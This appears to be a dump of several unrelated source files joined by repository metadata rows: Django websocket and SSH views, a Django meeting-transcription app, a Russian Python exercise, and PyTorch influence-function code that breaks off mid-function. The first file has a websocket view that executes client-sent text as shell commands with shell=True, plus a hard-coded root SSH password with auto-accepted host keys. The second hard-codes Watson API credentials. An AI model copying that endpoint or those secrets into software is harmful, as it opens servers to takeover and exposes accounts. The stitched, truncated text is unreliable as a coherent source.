        """Deliver the stored message via web_send()."""
        print("3")
        web_send(self.group_name, self.msg)
        print("8")
# Page view for the websocket demo; requires login and the project's custom
# permission check. `locals()` passes temp_name through to the template.
@login_required()
@permission_verify()
def websocket_index(request):
temp_name = "skworkorders/skworkorders-header.html"
return render(request,'skworkorders/websocket.html', locals())
def exec_command(comm):
    """Run `comm` on the fixed remote host over SSH and return its stdout bytes.

    FIX: the SSH connection is now closed in a ``finally`` block, so it is no
    longer leaked when exec_command()/read() raises.
    SECURITY NOTE(review): host and root credentials are hard-coded in source;
    they should be moved to configuration / environment variables.
    """
    hostname = '172.28.28.127'
    username = 'root'
    password = 'rft420e'
    ssh = paramiko.SSHClient()
    # Auto-accept unknown host keys (trusts the network — review).
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(hostname=hostname, username=username, password=password)
    try:
        stdin, stdout, stderr = ssh.exec_command(comm)
        result = stdout.read()
    finally:
        ssh.close()
    return result
# Websocket/HTTP hybrid view: over HTTP it echoes ?message=...; over a
# websocket it treats each incoming message as a shell command, streams the
# command's output lines back, then sends a final status string.
# SECURITY NOTE(review): shell=True on client-supplied input is remote command
# execution by design here — confirm this endpoint is meant to be an admin shell.
#@accept_websocket
def echo(request):
temp_name = "skworkorders/skworkorders-header.html"
if not request.is_websocket():#check whether this is a websocket connection
try:#plain HTTP request path
message = request.GET['message']
return HttpResponse(message)
except:
# NOTE(review): bare except — any failure (not just a missing GET key)
# falls through to rendering the page.
return render(request,'skworkorders/websocket.html', locals())
else:
for message in request.websocket:
cmd = message
print(cmd)
# request.websocket.send(exec_command(cmd))
pcmd = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.STDOUT,shell=True)
while True:
line = pcmd.stdout.readline().strip() #read one output line
print(line)
if line:
request.websocket.send(line)
else:
break
retcode=pcmd.wait()
# Status strings below are user-facing runtime values; left unmodified.
if retcode==0:
ret_message="执行成功"
else:
ret_message="执行失败"
request.websocket.send(ret_message)
# request.websocket.send(exec_command(cmd))#发送消息到客户端 | 26.522936 | 99 | 0.625735 | 310 | 0.104483 | 0 | 0 | 198 | 0.066734 | 0 | 0 | 645 | 0.217391 |
637cc4770c5d2eb1b7ce98fc871fe7b1224b66d6 | 9,482 | py | Python | src/Analyse/views.py | Hash-It-Out/MeetingMinutes | 73fc4650ca2bacba09ab3d6c0134f175025342d8 | [
"Apache-2.0"
] | 3 | 2021-03-14T23:35:59.000Z | 2021-12-16T12:28:40.000Z | src/Analyse/views.py | Hack-Overflow/HackOverflow | cff0a50c794e2c70ca65be8a8b9c7420e7a1927c | [
"Apache-2.0"
] | null | null | null | src/Analyse/views.py | Hack-Overflow/HackOverflow | cff0a50c794e2c70ca65be8a8b9c7420e7a1927c | [
"Apache-2.0"
] | 2 | 2018-10-06T06:18:22.000Z | 2018-10-06T17:51:39.000Z | from __future__ import print_function
from django.shortcuts import render
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.contrib.auth import get_user_model
import os
from django.core.mail import send_mail
import nltk
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords
import string
from .models import Meeting, MeetingAttendee, Team, upload_audio_path,get_filename_ext
from .FrequencySummarizer import FrequencySummarizer
import json,io
from os.path import join, dirname
from watson_developer_cloud import SpeechToTextV1
from watson_developer_cloud.websocket import RecognizeCallback, AudioSource
import threading
import math
from django.template import Template, Context
from django.http import HttpResponse
# Make it work for Python 2+3 and with Unicode
try:
to_unicode = unicode
except NameError:
to_unicode = str
# Keyword vocabularies used by the decision-routing scorer in `nltk()`:
# index 0 = front-end team, 1 = back-end team, 2 = management team.
keywords=[['frontend','front-end','responsive','color','theme','scheme','CSS','HTML','JS','javascript'],#frontend
['script','backend','back-end','database','query','object','script','python'],#backend
['people','business','analyse']]#management
# Speech-to-text pipeline: sends the uploaded audio to IBM Watson, groups the
# recognized words by speaker label into a transcript file, then summarizes,
# extracts decisions, caches everything in the session and renders the page.
# SECURITY NOTE(review): Watson credentials are hard-coded in source control.
def sttxt(request,filename,textfilepath,textfilename):
kl = []
service = SpeechToTextV1(
username='80a593b1-5a21-4ea4-adb1-e7218fb5a9fa',
password='1RGsVJJw8BlB',
url='https://stream.watsonplatform.net/speech-to-text/api')
models = service.list_models().get_result()
#print(json.dumps(models, indent=2))
model = service.get_model('en-US_NarrowbandModel').get_result()
#print(json.dumps(model, indent=2))
# with open(join(dirname(__file__), filename),'rb') as audio_file:
print(filename)
# Recognize with speaker_labels so words can be attributed to speakers,
# and cache the raw API response in data.json.
with open(filename,'rb') as audio_file:
with io.open('data.json', 'w', encoding='utf8') as outfile:
str_ = json.dumps(service.recognize(audio=audio_file,content_type='audio/mp3',speaker_labels=True).get_result(),indent=2)
outfile.write(to_unicode(str_))
outfile.close()
# Read JSON file
with open('data.json') as data_file:
data_loaded = json.load(data_file)
# Walk the speaker labels; accumulate words (spea) while the speaker stays
# the same, flush a "Speaker N: ..." line when the speaker changes.
spea = []
l=0
for i in data_loaded['speaker_labels']:
temp = ""
if l == int(i['speaker']):
for z in range(math.floor(i['from']),math.ceil(i['to'])):
for v in data_loaded['results']:
for m in v['alternatives']:
for n in m['timestamps']:
# timestamps entries are [word, start, end]
if n[1] >= i['from'] and n[2] <= i['to']:
# NOTE(review): `is not` compares identity, not equality —
# likely intended `temp != n[0]` to skip duplicate words.
if temp is not n[0]:
spea.append(n[0])
temp = n[0]
#print(spea)
else:
str1 = ' '.join(spea)
print(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt")
with io.open(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt", 'a', encoding='utf8') as outfile:
# print("Speaker "+str(l)+": "+str1+"\n")
str_ = outfile.write(" Speaker "+str(l)+": "+str1+"\n")
kl.append("Speaker "+str(l)+": "+str1+"\n")
outfile.close()
l = i['speaker']
del spea[0:len(spea)-1]
# Flush the trailing speaker segment.
str1 = ' '.join(spea)
with io.open(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt", 'a', encoding='utf8') as outfile:
# print("Speaker "+str(l)+": "+str1+"\n")
str_ = outfile.write(" Speaker "+str(l)+": "+str1+"\n")
kl.append("Speaker "+str(l)+": "+str1+"\n")
outfile.close()
# Summarize the transcript and extract routed decisions.
u = summary_function(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt")
print('vvvvvvvvvvvvvvvvvvv summarize VVVVVVVVVVVVVVVv')
print(u)
print('------------------- decisions ------------------------------------')
decision=nltk(textfilepath+'transcripts/'+textfilename+'/'+textfilename+".txt")
print(decision)
# Cache results in the session so transcript() can re-render them.
request.session['summ'] = u
request.session['trans1'] = kl
request.session['deci'] = decision
context={
'summarize':u,
'trans':kl,
}
return render(request,'Analyse/transcript.html',context)
#return render(request,'Analyse/transcript.html',context)
def transcript(request):
    """Re-render the transcript page from values sttxt() cached in the session."""
    ctx = {
        'summarize': request.session['summ'],
        'trans': request.session['trans1'],
        'deci': request.session['deci'],
    }
    return render(request, 'Analyse/transcript.html', ctx)
def summary_function(textfilepathfinal):
    """Summarize the transcript at the given path down to two sentences."""
    with open(textfilepathfinal, 'r') as transcript_file:
        contents = transcript_file.read().replace('\n', '')
    summarizer = FrequencySummarizer()
    return summarizer.summarize(str(contents), 2)
# Extract decisions from a transcript: text between a spoken "decide" and
# "decision end" is collected, keyword-matched (via stemming) against the
# module-level `keywords` lists, and routed to the highest-scoring team.
# Returns a flat list alternating [decision_text, team_name, ...].
# NOTE(review): this function's name shadows the `nltk` module imported at the
# top of the file; callers in this file invoke it as a function.
def nltk(textfilepathfinal):
# def nltk(request):
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
with open(textfilepathfinal, 'r') as myfile:
text=myfile.read().replace('\n','')
# text="Decide, the frontend team needs to make the website mobile reponsive decision end"
print(text)
datas=word_tokenize(text)
decision_string = str('')
decision=[]
frontend_score=0
backend_score=0
management_score=0
# Running keyword-match scores per team for the current decision span.
scores=[['Front-End Team', 0],
['Back-End Team', 0],
['Management Team', 0]]
flag=False # to see if 'Decide' word was said
ps=PorterStemmer() # variable for stemming
final_decisions=[]
# final_decisions=[[0 for x in range(100)] for y in range(100)]
z=0
for i in range(len(datas)):
# print(datas[i]+","+str(flag))
if datas[i].lower() == 'decide':
flag=True
# "decision end" closes the current decision span.
if flag==True and datas[i].lower() == 'decision' and datas[i+1].lower() == "end":
# print("hie")
flag=False
decision_string=decision_string.strip(' ')
print(decision_string)
# now doing the keyword matching using stemming
decision=word_tokenize(decision_string)
print(decision)
for j in range(len(decision)):
if decision[j] not in string.punctuation:
# stemmed_word=ps.stem(decision[j])
# print(stemmed_word)
# now checking if the stemmed word is in any of the keywords ka list and appropriately assigning scores
for x in range(len(keywords)):
for y in range(len(keywords[x])):
# print(str(x)+","+str(y))
if ps.stem(decision[j]).lower() == ps.stem(keywords[x][y]) :
scores[x][1] = scores[x][1]+1
print(scores)
# Route the decision to the team with the highest keyword score.
score=[]
score.append(scores[0][1])
score.append(scores[1][1])
score.append(scores[2][1])
notify=score.index(max(score))
notify_team=scores[notify][0]
# final_decisions[z][0]=decision_string
# final_decisions[z][1]=notify_team
final_decisions.append(decision_string)
final_decisions.append(notify_team)
z=z+1
print(notify_team)
decision_string=str('')
# While inside a decision span, accumulate tokens, skipping speaker tags
# ("Speaker", "N :") and repeated tokens.
# NOTE(review): datas[i+1] below can IndexError if a span runs to the last
# token — confirm transcripts always end with "decision end".
if flag==True and datas[i].lower() != 'speaker' and i!=0:
# i=i+1
if datas[i] in string.punctuation:
# if not any(p in datas[i] for p in string.punctuation):
# print(datas[i])
if datas[i] == ":" and datas[i-1].isdigit():
print("in")
else:
decision_string = decision_string + datas[i]
else:
if (datas[i].isdigit() and datas[i+1]== ":") or (i < len(datas) and datas[i] == datas[i+1]):
print("in")
else:
decision_string = decision_string + ' ' + datas[i]
context={
'datas':'hello'
}
# return render(request, "Analyse/nltk.html", context)
# print(final_decisions)
return final_decisions
User=get_user_model()
def handle_uploaded_file(file, filename, foldername):
    """Save an uploaded file under MEDIA_ROOT and ensure its transcript folder exists.

    FIX: ``os.mkdir`` fails when intermediate directories are missing and races
    with concurrent requests; ``os.makedirs(..., exist_ok=True)`` creates the
    whole path idempotently.
    """
    print("--here--")
    print(filename)
    BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
    foldername = MEDIA_ROOT + '/transcripts/' + foldername
    # Create the transcript directory (and any missing parents) if needed.
    os.makedirs(foldername, exist_ok=True)
    # Stream the upload to disk chunk by chunk to bound memory use.
    with open(MEDIA_ROOT + '/' + filename, 'wb+') as destination:
        for chunk in file.chunks():
            destination.write(chunk)
# View: on POST, saves the uploaded meeting recording, runs the Watson
# speech-to-text pipeline (sttxt) on it, and updates Meeting id=1; always
# renders the meetings page listing attendees of the user's meetings.
# NOTE(review): Meeting id=1 is hard-coded — confirm single-meeting assumption.
def meeting(request, *args, **kwargs):
print("hi")
if request.method == "POST":
print("haha")
print(request.FILES['recording'])
recording=upload_audio_path(request,str(request.FILES['recording']))
print(recording)
folder_name, ext=get_filename_ext(recording)
print(folder_name)
handle_uploaded_file(request.FILES['recording'], recording, folder_name)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
filepath=MEDIA_ROOT+'/'+recording
newfilepath=MEDIA_ROOT+'/'
print(filepath)
m=Meeting.objects.get(id=1)
m.recording = filepath # change field
m.save() # this will update only
# Run recognition + transcript generation on the saved file.
sttxt(request, filepath,newfilepath,folder_name)
print("hagre")
user=request.user
meeting=Meeting.objects.filter(conductor=request.user)
# print(meeting)
users=User.objects.exclude(username=request.user.username)
# print(users)
# Flatten the attendees of every meeting conducted by this user.
ma=[]
for i in meeting:
meetatten=MeetingAttendee.objects.filter(meeting=i)
for j in meetatten:
ma.append(j)
# print(ma)
context={
'datas':'hello',
'meetatten':ma,
}
return render(request, "Analyse/meetings.html", context)
def calenda(request):
    """Read the submitted agenda from a POST request.

    FIX: the original tested the undefined name ``method`` (NameError at
    runtime); the request's HTTP method lives on ``request.method``.
    """
    if request.method == 'POST':
        # `agenda` is consumed by the statement on the following source line.
        agenda = request.POST['agenda']
print(agenda) | 28.053254 | 133 | 0.640793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,476 | 0.261126 |
637cdb4f017832b717342e2928773f70e1670584 | 316 | py | Python | 000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p01st07TASK07_20210205_print.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p01st07TASK07_20210205_print.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p01st07TASK07_20210205_print.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | '''
Напишите программу, которая объявляет переменную: "name" и присваивает ей значение "Python".
Программа должна напечатать в одну строку, разделяя пробелами:
Строку "name"
Значение переменной "name"
Число 3
Число 8.5
Sample Input:
Sample Output:
name Python 3 8.5
'''
# Declare the required variable, then print the literal "name", its value,
# and the numbers 3 and 8.5 separated by single spaces.
name = 'Python'
print(' '.join(['name', name, str(3), str(8.5)]))
| 19.75 | 92 | 0.743671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 437 | 0.933761 |
637e1e9bf118d9a1429a4df90953398c25b3dbcc | 24,568 | py | Python | cross_loss_influence/helpers/influence_function.py | CORE-Robotics-Lab/Cross_Loss_Influence_Functions | 6f0fa45f8896cd6c238c143eca6ddebef97b642c | [
"MIT"
] | 1 | 2022-03-08T05:59:17.000Z | 2022-03-08T05:59:17.000Z | cross_loss_influence/helpers/influence_function.py | CORE-Robotics-Lab/Cross_Loss_Influence_Functions | 6f0fa45f8896cd6c238c143eca6ddebef97b642c | [
"MIT"
] | null | null | null | cross_loss_influence/helpers/influence_function.py | CORE-Robotics-Lab/Cross_Loss_Influence_Functions | 6f0fa45f8896cd6c238c143eca6ddebef97b642c | [
"MIT"
] | null | null | null | # Created by Andrew Silva
# Extensions to https://github.com/nimarb/pytorch_influence_functions
import torch
import time
import datetime
import numpy as np
import copy
import logging
from torch.autograd import grad
import random
from cross_loss_influence.helpers.bolukbasi_prior_work.prior_pca_debiasing import extract_txt_embeddings
from torch.utils.data.dataloader import DataLoader
DEVICE = 'cuda'
def calc_influence_single(model, train_dataset, z_test, t_test, recursion_depth, r, test_indices, scifi=True):
"""Calculates the influences of all training data points on a single
test dataset image.
Arugments:
model: pytorch model
train_loader: DataLoader, loads the training dataset
embedding_pair: pair of embeddings we want to diff
recursion_depth: int, number of recursions to perform during s_test
calculation, increases accuracy. r*recursion_depth should equal the
training dataset size.
r: int, number of iterations of which to take the avg.
of the h_estimate calculation; r*recursion_depth should equal the
training dataset size.
Returns:
influence: list of float, influences of all training data samples
for one test sample
harmful: list of float, influences sorted by harmfulness
helpful: list of float, influences sorted by helpfulness
"""
# s_test = invHessian * grad(test loss) — estimated over a shuffled pass.
train_loader = DataLoader(train_dataset, shuffle=True)
s_test_vec = calc_s_test_single(model,
z_test,
t_test,
train_loader,
recursion_depth=recursion_depth,
r=r,
test_indices=test_indices,
scifi=scifi)
# Calculate the influence function
train_dataset_size = len(train_dataset)
influences = []
# Unshuffled pass so influence indices line up with dataset order.
train_loader = DataLoader(train_dataset, shuffle=False)
for index, batch_data in enumerate(train_loader):
good_enough = False # Is a word of interest in this sample?
words, contexts = vectorized_influence_data_to_tensors(batch_data)
for v_index in test_indices:
if v_index in words.cpu():
good_enough = True
# Skip samples containing none of the words of interest.
if not good_enough:
continue
words = torch.autograd.Variable(words).to(device=DEVICE)
contexts = torch.autograd.Variable(contexts).to(device=DEVICE)
loss_val = model.forward_no_negatives(words, contexts)
grad_z_vec = list(grad(loss_val, list(model.parameters()), create_graph=True))
# For sparse: (recursion_depth <= 1 signals sparse-gradient mode)
if recursion_depth <= 1:
tmp_influence = 0
for k, j in zip(grad_z_vec, s_test_vec):
if (k * j).indices().size(1) > 0:
tmp_influence -= (k * j).values().sum()/train_dataset_size
# For dense
else:
tmp_influence = -sum(
[
####################
# TODO: potential bottle neck, takes 17% execution time
# torch.sum(k * j).data.cpu().numpy()
####################
torch.sum(k * j).data
for k, j in zip(grad_z_vec, s_test_vec)
]) / train_dataset_size
influences.append([index, tmp_influence.cpu()])
influences = np.array(influences)
# Sort ascending by influence: most harmful first, then reverse for helpful.
harmful = influences[influences[:, 1].argsort()]
helpful = harmful[::-1]
influences = influences[:, 1]
return influences, harmful.tolist(), helpful.tolist()
def calc_s_test_single(model, z_test, t_test, train_loader,
                       damp=0.01, scale=25, recursion_depth=5000, r=1, test_indices=[], scifi=True):
    """Calculates s_test for a single test point taking into account the whole
    training dataset. s_test = invHessian * nabla(Loss(test_img, model params))

    Arguments:
        model: pytorch model, for which s_test should be calculated
        z_test: test data point (e.g. final embedding position)
        t_test: test target (e.g. initial embedding position)
        train_loader: pytorch dataloader, which can load the train data
        damp: float, influence function damping factor
        scale: float, influence calculation scaling factor
        recursion_depth: int, number of recursions to perform during s_test
            calculation, increases accuracy. r*recursion_depth should equal the
            training dataset size.
        r: int, number of independent h_estimate rounds to average;
            r*recursion_depth should equal the training dataset size.
        test_indices: list of int, vocabulary ids forwarded to s_test to
            filter relevant training batches
        scifi: bool, forwarded to s_test (loss-based vs. bias-based start vector)
    Returns:
        s_test_vec: list of torch tensors (one per model parameter), the
            averaged s_test estimate; None entries are dropped"""
    s_test_vec_list = []
    # For my sparse approach, 1 pass is all we need and we go through the
    # entire dataset to get samples of import.
    for i in range(r):
        print("Beginning another round of estimation")
        s_test_vec_list.append(s_test(z_test, t_test, model, train_loader, damp=damp, scale=scale,
                                      recursion_depth=recursion_depth, test_indices=test_indices, scifi=scifi))
    # Average the r independent estimates element-wise.
    # BUG FIX: the previous code did `s_test_vec += s_test_vec_list[i]`, which
    # *concatenates* Python lists instead of adding the per-parameter tensors,
    # silently corrupting the average whenever r > 1.
    s_test_vec = s_test_vec_list[0]
    for i in range(1, r):
        s_test_vec = [
            a if b is None else (b if a is None else a + b)
            for a, b in zip(s_test_vec, s_test_vec_list[i])
        ]
    s_test_vec = [i / r for i in s_test_vec if i is not None]
    return s_test_vec
def s_test(z_test, t_test, model, train_loader, damp=0.01, scale=25.0,
           recursion_depth=5000, test_indices=[], scifi=True):
    """Estimate s_test, the inverse-Hessian-vector product, for one test point.

    s_test can be precomputed for each test point of interest, and then
    multiplied with grad_z to get the desired value for each training point.
    Here, stochastic estimation (a damped, scaled fixed-point iteration) is
    used to calculate s_test.

    Arguments:
        z_test: torch tensor / structure, test data point(s)
        t_test: torch tensor / structure, test target(s)
        model: torch NN, model used to evaluate the dataset
        train_loader: torch dataloader, can load the training dataset
        damp: float, dampening factor of the iteration
        scale: float, scaling factor of the iteration
        recursion_depth: int, number of update iterations; should be large
            enough that the value stabilises.  A value <= 1 switches into the
            sparse mode (see success_limit below).
        test_indices: list of int, vocabulary ids; only training batches that
            contain at least one of these ids contribute an update
        scifi: bool, if True start from the gradient of the MSE loss between
            z_test and t_test, otherwise from the gradient of the bias measure
    Returns:
        h_estimates: list of torch tensors (one per model parameter), the
            current s_test estimate; entries may be None for parameters that
            received no gradient (allow_unused=True below)"""
    # v = grad_z(z_test, t_test, model)
    # Starting vector v: gradient of the chosen scalar test quantity.
    if scifi:
        v = calc_loss(z_test, t_test) # Change this to bias estimation
    else:
        v = calc_bias(z_test, t_test, model)
    v = list(grad(v, list(model.parameters()), create_graph=True, allow_unused=True)) # A bit sketched by this
    # v[1] = v[0]
    h_estimates = v.copy()
    # In sparse mode (recursion_depth <= 1) the loop instead stops after a
    # fixed number of *successful* updates.
    if recursion_depth <= 1: # If we're sparse
        success_limit = 5000
    else:
        success_limit = recursion_depth
    ################################
    # TODO: Dynamically set the recursion depth so that iterations stops
    # once h_estimate stabilises
    ################################
    successes = 0
    for i, batch_data in enumerate(train_loader): # instead of random, get all samples of relevance in the dataset.
        good_enough = False # Is a word of interest in this sample?
        words, contexts = vectorized_influence_data_to_tensors(batch_data)
        # Only use batches containing at least one of the test word ids.
        for v_index in test_indices:
            if v_index in words.cpu():
                good_enough = True
        if not good_enough:
            continue
        words = torch.autograd.Variable(words).to(device=DEVICE)
        contexts = torch.autograd.Variable(contexts).to(device=DEVICE)
        loss_val = model.forward_no_negatives(words, contexts)
        hv = hvp(loss_val, list(model.parameters()), h_estimates, sparse=recursion_depth == 1)
        # Recursively calculate h_estimate
        # hvp returns False when the elementwise products vanish; skip then.
        if not hv:
            continue
        successes += 1
        # h_estimates = [
        #     _v + (1 - damp) * h_estimate - _hv / scale
        #     for _v, h_estimate, _hv in zip(v, h_estimates, hv)]
        # Update rule: h <- v + (1 - damp) * h - Hv / scale, applied only to
        # parameters whose estimate is not None.
        for h_index, bucket in enumerate(zip(v, h_estimates, hv)):
            temp_v, h_est, temp_hv = bucket
            if h_est is not None:
                temp_h_est = temp_v + (1 - damp) * h_est - temp_hv / scale
                # print((h_estimates[h_index] - temp_h_est).abs().sum())
                h_estimates[h_index] = temp_h_est
                # h_estimates[h_index] = temp_v + (1 - damp) * h_est - temp_hv / scale
        if successes >= success_limit:
            break
    return h_estimates
# def grad_z(z, t, model):
# """Calculates the gradient z. One grad_z should be computed for each
# training sample.
# Arguments:
# z: torch tensor, training data points
# e.g. an image sample (batch_size, 3, 256, 256)
# t: torch tensor, training data labels
# model: torch NN, model used to evaluate the dataset
# Returns:
# grad_z: list of torch tensor, containing the gradients
# from model parameters to loss"""
# model.eval()
# # initialize
# z = z.to(device=DEVICE)
# t = t.to(device=DEVICE)
# y = model(z)
# loss = calc_loss(y, t)
# # Compute sum of gradients from model parameters to loss
# return list(grad(loss, list(model.parameters()), create_graph=True))
def calc_bias(target_set, attribute_set, model):
    """Return a WEAT-style effect size for two target sets vs. two attribute sets.

    Arguments:
        target_set: pair (targets_one, targets_two) of token-id tensors
        attribute_set: pair (attribute_one, attribute_two) of token-id tensors
        model: embedding model with a `predict` method (used via similarity_diff)
    Returns:
        torch scalar: difference of mean association scores, normalised by the
        standard deviation over all scores.
    """
    first_targets, second_targets = target_set[0], target_set[1]
    first_attrs, second_attrs = attribute_set[0], attribute_set[1]
    # Pre-allocated score buffers (filled pairwise below).
    assoc_one = torch.zeros(len(first_targets))
    assoc_two = torch.zeros(len(second_targets))
    pooled = torch.zeros(len(first_targets) + len(second_targets))
    for idx, (tgt_a, tgt_b) in enumerate(zip(first_targets, second_targets)):
        diff_a = similarity_diff(tgt_a, first_attrs, second_attrs, model)
        diff_b = similarity_diff(tgt_b, first_attrs, second_attrs, model)
        assoc_one[idx] = diff_a
        assoc_two[idx] = diff_b
        pooled[2 * idx] = diff_a
        pooled[2 * idx + 1] = diff_b
    return (assoc_one.mean() - assoc_two.mean()) / pooled.std()
def similarity_diff(word, attrs_A, attrs_B, model):
    """Mean cosine similarity of `word` to attrs_A minus its mean to attrs_B.

    Arguments:
        word: token-id tensor for the target word
        attrs_A: list of token-id tensors (first attribute set)
        attrs_B: list of token-id tensors (second attribute set);
            assumed to have the same length as attrs_A (zip truncates otherwise)
        model: embedding model with a `predict` method
    Returns:
        torch scalar, mean(cos(word, attrs_A)) - mean(cos(word, attrs_B)),
        differentiable w.r.t. the model parameters.
    """
    # BUG FIX: the previous version pre-allocated leaf tensors with
    # requires_grad=True and wrote into them in place, which raises
    # "a leaf Variable that requires grad is being used in an in-place
    # operation" at runtime.  Collect the per-attribute similarities and
    # stack them instead, which also keeps the autograd graph intact.
    sims_a = []
    sims_b = []
    for a_A, a_B in zip(attrs_A, attrs_B):
        sims_a.append(cos_diff(word, a_A, model))
        sims_b.append(cos_diff(word, a_B, model))
    return torch.stack(sims_a).mean() - torch.stack(sims_b).mean()
def cos_diff(x, y, model):
    """Cosine similarity between the model embeddings of token ids x and y."""
    emb_x = model.predict(x)
    emb_y = model.predict(y)
    return torch.nn.functional.cosine_similarity(emb_x, emb_y)
def calc_loss(y, t):
    """Return the mean-squared-error loss between prediction and target.

    Arguments:
        y: torch tensor, input with size (minibatch, nr_of_classes)
        t: torch tensor, target of the same shape
    Returns:
        loss: scalar tensor, the mean squared error
    """
    # TODO: Test cosine loss... but clustering doesn't use that
    return torch.nn.functional.mse_loss(y, t, reduction='mean')
def hvp(ys, xs, v, sparse=False):
    """Multiply the Hessian of `ys` w.r.t. `xs` by the vector `v`.

    Uses a backprop-of-backprop approach, which works even for large
    Hessians: first compute g = d(ys)/d(xs), then differentiate <g, v>.

    Arguments:
        ys: scalar tensor, e.g. the output of the loss function
        xs: list of torch tensors over which the Hessian is taken
        v: list of torch tensors, same structure as xs, multiplied with
            the Hessian
        sparse: bool, if True assume sparse gradients and accumulate via
            indices()/values()
    Returns:
        tuple of torch tensors with the Hessian-vector product, or False
        when the accumulated inner product is exactly zero (nothing to
        differentiate).
    Raises:
        ValueError: if xs and v have different lengths.
    """
    if len(xs) != len(v):
        raise ValueError("xs and v must have the same length.")
    # First backward pass: gradients of ys w.r.t. xs, kept on the graph
    # so they can be differentiated again below.
    first_grads = grad(ys, xs, create_graph=True)
    # Accumulate the inner product sum_i <d(ys)/d(x_i), v_i>.
    dot = 0
    for grad_part, v_part in zip(first_grads, v):
        if sparse:
            product = grad_part * v_part
            if product.indices().size(1) > 0:
                dot = dot + product.values().sum()
        else:
            if grad_part is not None and v_part is not None:
                # v is treated as a constant here (detach).
                dot = dot + torch.sum(grad_part * v_part.detach())
    if dot == 0:
        # No overlap between the gradients and v: signal the caller to skip.
        return False
    # Second backward pass: d(dot)/d(xs) is the Hessian-vector product.
    return grad(dot, xs)
def vectorized_influence_data_to_tensors(batch_data_in):
    """Split a batch of (word, context) pairs into two flat long tensors.

    Arguments:
        batch_data_in: iterable of (word_ids, context_ids) pairs
    Returns:
        (words, contexts): 1-D torch.long tensors on DEVICE
    """
    word_ids = [pair[0] for pair in batch_data_in]
    context_ids = [pair[1] for pair in batch_data_in]
    words = torch.tensor(word_ids, dtype=torch.long, device=DEVICE).view(-1)
    contexts = torch.tensor(context_ids, dtype=torch.long, device=DEVICE).view(-1)
    return words, contexts
def load_skipgram(fn, device):
    """Restore a SkipGramModel from a checkpoint file.

    The model's vocabulary size, embedding dimension and sparsity are read
    directly off the saved input-embedding weight matrix.

    Arguments:
        fn: str, checkpoint filename inside the project's checkpoints folder
        device: torch device the restored model is moved to
    Returns:
        the loaded SkipGramModel
    """
    ckpt_path = os.path.join(MODEL_SAVE_DIR, PROJECT_NAME, 'checkpoints', fn)
    checkpoint = torch.load(ckpt_path, map_location='cpu')
    weights = checkpoint['model_data']['u_embeddings.weight']
    model = SkipGramModel(vocab_size=weights.size(0),
                          embedding_dim=weights.size(1),
                          sparse=weights.is_sparse).to(device=device)
    model.load_state_dict(checkpoint['model_data'])
    return model
def load_prior_work_embeddings(model, fn):
    """Overwrite the model's input embeddings with vectors from a text file.

    Arguments:
        model: skip-gram model whose `u_embeddings` weights are replaced
        fn: str, path of the text embedding file read by extract_txt_embeddings
    Returns:
        the same model, with its embedding weights replaced in place.
    """
    # NOTE(review): assumes the row order of `embeds` matches the model's
    # vocabulary indexing; `words` is discarded here — confirm upstream.
    embeds, words = extract_txt_embeddings(fn)
    model.u_embeddings.weight.data = torch.from_numpy(embeds).float().to(DEVICE)
    return model
def explain_embed_pos(word='mandalorians',
                      model_name='DENSE_scifi_window-3_negatives-5',
                      data_fn='all_scripts_numericalized_dataset.pkl',
                      vocab_fn='all_scripts_stoi.pkl',
                      window_size=5,
                      r=1,
                      recursion_depth=500):
    """Compute training-sample influences on the embedding position of `word`.

    Loads the initial and final checkpoints of a skip-gram model, takes the
    movement of `word`'s embedding between them as the test quantity, and runs
    the influence computation over the training dataset.

    Arguments:
        word: str, vocabulary token to explain
        model_name: str, checkpoint name prefix (without the
            '_init'/'_last_checkpoint.pth.tar' suffix)
        data_fn: str, numericalized dataset filename inside DATA_DIR
        vocab_fn: str, pickled string-to-index vocabulary filename
        window_size: int, skip-gram context window of the dataset
        r: int, averaging rounds for the s_test estimate
        recursion_depth: int, iterations per s_test round
    Returns:
        (influence, harmful, helpful, dataset, all_keys): the outputs of
        calc_influence_single plus the dataset and the vocabulary key list.
    """
    dataset = InfluenceMedDataset(data_dir=DATA_DIR,
                                  filename=data_fn,
                                  window_size=window_size)
    # Use a context manager so the vocabulary file is closed deterministically
    # (the previous version left the handle open).
    with open(os.path.join(DATA_DIR, vocab_fn), 'rb') as vocab_file:
        stoi = pickle.load(vocab_file)
    # list(dict) preserves insertion order, matching the old manual loop.
    all_keys = list(stoi.keys())
    all_values = list(stoi.values())
    mando_ind = torch.tensor([all_values[all_keys.index(word)]], dtype=torch.long).to(device=DEVICE)
    # checkpoint = torch.load(os.path.join(MODEL_SAVE_DIR, PROJECT_NAME, 'checkpoints',
    #                                      'DENSE_medkd_window-5_negatives-10_last_checkpoint.pth.tar'), map_location='cpu')
    # NOTE(review): `device` is the module-level name bound in the __main__
    # block below — confirm it is defined when calling this from elsewhere.
    model = load_skipgram(model_name+'_init_checkpoint.pth.tar', device)
    model.eval()
    mando_init = model.predict(mando_ind)
    model = load_skipgram(model_name+'_last_checkpoint.pth.tar', device)
